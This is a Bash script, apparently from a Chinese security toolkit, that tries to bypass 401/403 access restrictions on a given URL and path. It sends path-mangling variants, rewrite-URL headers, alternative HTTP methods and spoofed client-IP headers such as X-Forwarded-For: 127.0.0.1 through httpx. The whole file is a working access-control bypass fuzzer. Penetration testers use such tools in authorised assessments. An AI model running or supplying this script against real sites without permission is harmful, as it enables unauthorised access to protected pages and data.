#!/bin/bash

# ======================== !! NOTE !! ========================
#  ________ ________ ________ ________ ________ ________ ________ ________ ________     ___    ___
# |\  _____\\  _____\\  _____\\  _____\\  _____\\  _____\\  _____\\  _____\\   __  \   |\  \  /  /|
# \ \  \__/\ \  \__/\ \  \__/\ \  \__/\ \  \__/\ \  \__/\ \  \__/\ \  \__/\ \  \|\  \  \ \  \/  / /
#  \ \   __\\ \   __\\ \   __\\ \   __\\ \   __\\ \   __\\ \   __\\ \   __\\ \  \\\  \  \ \    / /
#   \ \  \_| \ \  \_| \ \  \_| \ \  \_| \ \  \_| \ \  \_| \ \  \_| \ \  \_| \ \  \\\  \  /     \/
#    \ \__\   \ \__\   \ \__\   \ \__\   \ \__\   \ \__\   \ \__\   \ \__\   \ \_______\/  /\   \
#     \|__|    \|__|    \|__|    \|__|    \|__|    \|__|    \|__|    \|__|    \|_______/__/ /\ __\
#                                                                                      |__|/ \|__|

# ===================== 基础变量设置 =====================

Fuzz_head=(X-Forwarded-For X-Forwarded-Host X-Remote-IP X-Remote-Addr X-Originating-IP X-Custom-IP-Authorization True-Client-IP Client-IP X-Client-IP X-Real-IP Referer X-Powered-By X-True-IP X-Forwarded-By Forwarded X-Host Proxy-Client-IP WL-Proxy-Client-IP CF-Connecting-IP)
xff_403=(127.0.0.1 0.0.0.0 192.168.0.1 10.0.0.1 172.16.0.1)

# ===================== 基础函数 =====================

Echo_INFOR(){

    echo -e "\033[1;36m$(date +"%H:%M:%S")\033[0m \033[1;32m[INFOR]\033[0m - \033[1;32m$1\033[0m"

}

Echo_ALERT(){

    echo -e "\033[1;36m$(date +"%H:%M:%S")\033[0m \033[1;33m[ALERT]\033[0m - \033[1;33m$1\033[0m"

}

Echo_ERROR(){

    echo -e "\033[1;36m$(date +"%H:%M:%S")\033[0m \033[1;31m[ERROR]\033[0m - \033[1;31m$1\n\033[0m"

}

print_some(){

    echo -e ""
    echo -e "\033[1;36m------------------------------------------------------------------------------------------\033[0m"
    echo -e ""

}

# ===================== 检查模块 =====================

check_null(){

    if [ $1 ==  ] 2>> /dev/null
    then
        Echo_ERROR "输入不可为空"
        exit 1
    fi

}

bypass_Fuzz(){

    check_null "$1" || exit 1

    rm -f /tmp/bypass_target.txt > /dev/null 2>&1

    Echo_INFOR "HTTP URL character/parameter Fuzz"

    bypass_target=$1/$2 && echo $bypass_target > /tmp/bypass_target.txt
    bypass_target=$1/../$2 && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1../$2 && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/$2..\;/ && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/$2/ && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1//$2/ && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/$2\;/ && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/$2/. && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/$2/.. && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1//$2// && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/./$2/./ && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/./$2/.. && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/$2%20 && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/%2f/$2 && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/%2e/$2 && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/%252e/$2 && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1%ef%bc%8f$2 && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/$2%09 && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/$2? && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/$2* && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/$2.html && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/$2.json && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/$2/?anything && echo $bypass_target >> /tmp/bypass_target.txt
    bypass_target=$1/$2# && echo $bypass_target >> /tmp/bypass_target.txt
    echo -e ""

    # https://github.com/projectdiscovery/httpx
    httpx -l /tmp/bypass_target.txt -title -content-length -status-code -silent -threads 50 -random-agent -follow-redirects
    print_some

    rm -f /tmp/bypass_target.txt > /dev/null 2>&1

    Echo_INFOR "Fuzz_Header : X-Original-URL: $2"
    echo "$1/$2" | httpx -title -content-length -status-code -silent -threads 5 -random-agent -H "X-Original-URL: $2" -follow-redirects
    Echo_INFOR "Fuzz_Header : X-rewrite-url: $2"
    echo "$1" | httpx -title -content-length -status-code -silent -threads 5 -random-agent -H "X-rewrite-url: $2" -follow-redirects

    print_some
    Echo_INFOR "HTTP Method based bypass"
    Echo_INFOR "Fuzz_Method : HEAD"
    echo "$1/$2" | httpx -title -content-length -status-code -silent -threads 5 -random-agent -follow-redirects -x HEAD
    Echo_INFOR "Fuzz_Method : Put"
    echo "$1/$2" | httpx -title -content-length -status-code -silent -threads 5 -random-agent -follow-redirects -x Put
    Echo_INFOR "Fuzz_Method : Patch"
    echo "$1/$2" | httpx -title -content-length -status-code -silent -threads 5 -random-agent -follow-redirects -x Patch
    Echo_INFOR "Fuzz_Method : Delete"
    echo "$1/$2" | httpx -title -content-length -status-code -silent -threads 5 -random-agent -follow-redirects -x Delete
    Echo_INFOR "Fuzz_Method : Connect"
    echo "$1/$2" | httpx -title -content-length -status-code -silent -threads 5 -random-agent -follow-redirects -x Connect
    Echo_INFOR "Fuzz_Method : Options"
    echo "$1/$2" | httpx -title -content-length -status-code -silent -threads 5 -random-agent -follow-redirects -x Options
    Echo_INFOR "Fuzz_Method : Trace"
    echo "$1/$2" | httpx -title -content-length -status-code -silent -threads 5 -random-agent -follow-redirects -x Trace

    print_some
    Echo_INFOR "HTTP Header based bypass Fuzz"

    for x in "${!Fuzz_head[@]}";
    do
        for y in "${!xff_403[@]}";
        do
            Echo_INFOR "Fuzz_Header : ${Fuzz_head[$x]}: ${xff_403[$y]}"
            echo "$1/$2" | httpx -title -content-length -status-code -silent -threads 5 -random-agent -H "${Fuzz_head[$x]}: ${xff_403[$y]}" -follow-redirects
        done
    done

}

# -help
Help_Info(){

    echo -e ""
    echo -e "\033[1;34m|—— -u    [URL] [PATH]          fuzz 401、403 未授权页面\033[0m"
    echo -e "\033[1;32m|———— 403fuzz -u http://testphp.vulnweb.com admin\033[0m"
    echo -e "\ncreate by ffffffff0x"

}

case "$1" in
    -u | u)
        echo -e "\033[1;33m\n>> fuzz 401 未授权页面\n\033[0m"
        bypass_Fuzz "$2" "$3"
        ;;
    -h | h | -help | help)
        printf "\033c"
        Help_Info
        exit 1
        ;;
    *)
        Banner
        echo -e "\033[1;32mones 当前版本 :\033[0m \033[1;35m$ones_Version \033[0m"
        echo -e "\n\033[1;34m使用 -h/-help 选项查看帮助文档\033[0m"
        exit 1
        ;;
esac

echo -e "\033[1;36m \n-----OVER-----\n \033[0m"
